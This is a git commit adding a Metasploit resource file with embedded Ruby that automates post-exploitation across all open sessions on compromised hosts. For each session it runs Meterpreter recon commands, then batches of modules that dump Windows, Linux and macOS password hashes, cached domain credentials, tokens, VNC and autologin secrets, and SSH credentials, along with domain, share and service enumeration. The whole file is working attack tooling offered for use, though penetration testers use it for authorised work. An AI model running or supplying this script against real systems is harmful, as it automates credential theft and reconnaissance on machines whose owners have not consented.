multi_post resource file - initial commit

2012-02-06 08:50:32 +01:00 · 2012-02-06 08:50:32 +01:00 · 8825f87325
parent 2d35cf4b66
commit 8825f87325
1 changed files with 119 additions and 0 deletions
--- a/scripts/resource/multi-post-rc-internal.rc
+++ b/scripts/resource/multi-post-rc-internal.rc
@ -0,0 +1,119 @@
+# multi_post.rc
+# Author: m-1-k-3 (Web: http://www.s3cur1ty.de / Twitter: @s3cur1ty_de)
+
+# This Metasploit RC-File could be used to automate the post-exploitation process
+# VERBOSE is used from the global datastore
+# check out the meterpreter_commands and the modules_win and modules_lin and modules_multi
+# you could add your own post exploitation modules into them
+
+<ruby>
+if (framework.datastore['VERBOSE'] == "true")	#we look in the global datastore for a global VERBOSE option and use it
+	verbose = 1 #true
+else
+	verbose = 0
+end
+
+meterpreter_commands = [
+	'sysinfo',
+	'getuid',
+	'getpid',
+	'ps',
+	'ipconfig'
+]
+
+modules_win = [
+	'post/windows/gather/hashdump',
+	'post/windows/gather/cachedump',
+	'post/windows/gather/smart_hashdump',
+	'post/windows/gather/enum_tokens',
+	'post/windows/gather/enum_domain',
+	'post/windows/gather/enum_domain_group_users',
+	'post/windows/gather/enum_domain_tokens',
+	'post/windows/gather/enum_hostfile',
+	'post/windows/gather/enum_ie',
+	'post/windows/gather/enum_logged_on_users',
+	'post/windows/gather/enum_ms_product_keys',
+	'post/windows/gather/credentials/vnc',
+	'post/windows/gather/credentials/windows_autologin',
+	'post/windows/gather/checkvm',
+	'post/windows/gather/enum_applications',
+	'post/windows/gather/enum_services',
+	'post/windows/gather/enum_shares',
+	'post/windows/gather/enum_snmp',
+	'post/windows/gather/enum_devices',
+	'post/windows/gather/enum_powershell_env'
+]	# add some more modules or comment some out ...
+modules_lin = [
+	'post/linux/gather/hashdump',
+	'post/osx/gather/hashdump',
+	'post/linux/gather/checkvm',
+	'post/linux/gather/enum_cron',
+	'post/linux/gather/enum_linux',
+	'post/linux/gather/enum_packages',
+	'post/linux/gather/enum_services',
+	'post/osx/gather/enum_osx'
+]
+modules_multi = [
+	'post/multi/gather/env',
+	'post/multi/gather/ssh_creds'
+]
+
+if (framework.sessions.length > 0)		# lets start if we have a session
+	print_status("starting with post exploitation stuff")
+	framework.sessions.each_key do |sid|
+		session = framework.sessions[sid]
+		#meterpreter commands against every meterpreter session
+		if(session.type == "meterpreter")
+			print_line("starting meterpreter commands on session number #{sid}")
+			meterpreter_commands.each { |command|
+				print_line("running meterpreter command #{command}")
+				session.console.run_single("#{command.to_s}")
+				print_line
+			}
+		end
+	end
+
+	print_status("starting the post exploitation with post exploitation modules")
+
+	# lets start with post exploitation modules
+	framework.sessions.each_key do |sid|
+		session = framework.sessions[sid]
+		ips = session.tunnel_peer.split(":")
+		print_status("Session ID: #{sid.to_i} - IP: #{ips[0]}")
+		
+		modules_multi.each { |modul|		# multi -> all sessions
+				run_single("use #{modul}")
+				run_single("set SESSION #{sid}")
+				if (verbose == 1)
+					run_single("run -j")
+				else
+					run_single("run -j -q")
+				end
+		}
+		if(session.platform =~ /win/)		# windows sessions
+			modules_win.each { |modul|
+				run_single("use #{modul}")
+				run_single("set SESSION #{sid}")
+				if (verbose == 1)
+					run_single("run -j")
+				else
+					run_single("run -j -q")
+				end
+			}
+		else							# all other sessions -> typical some linux or unix based systems
+			modules_lin.each { |modul|
+				run_single("use #{modul}")
+				run_single("set SESSION #{sid}")
+				if (verbose == 1)
+					run_single("run -j")
+				else
+					run_single("run -j -q")
+				end
+			}
+		end
+	end
+else
+	print_error("no sessions available")
+end
+run_single("back")
+</ruby>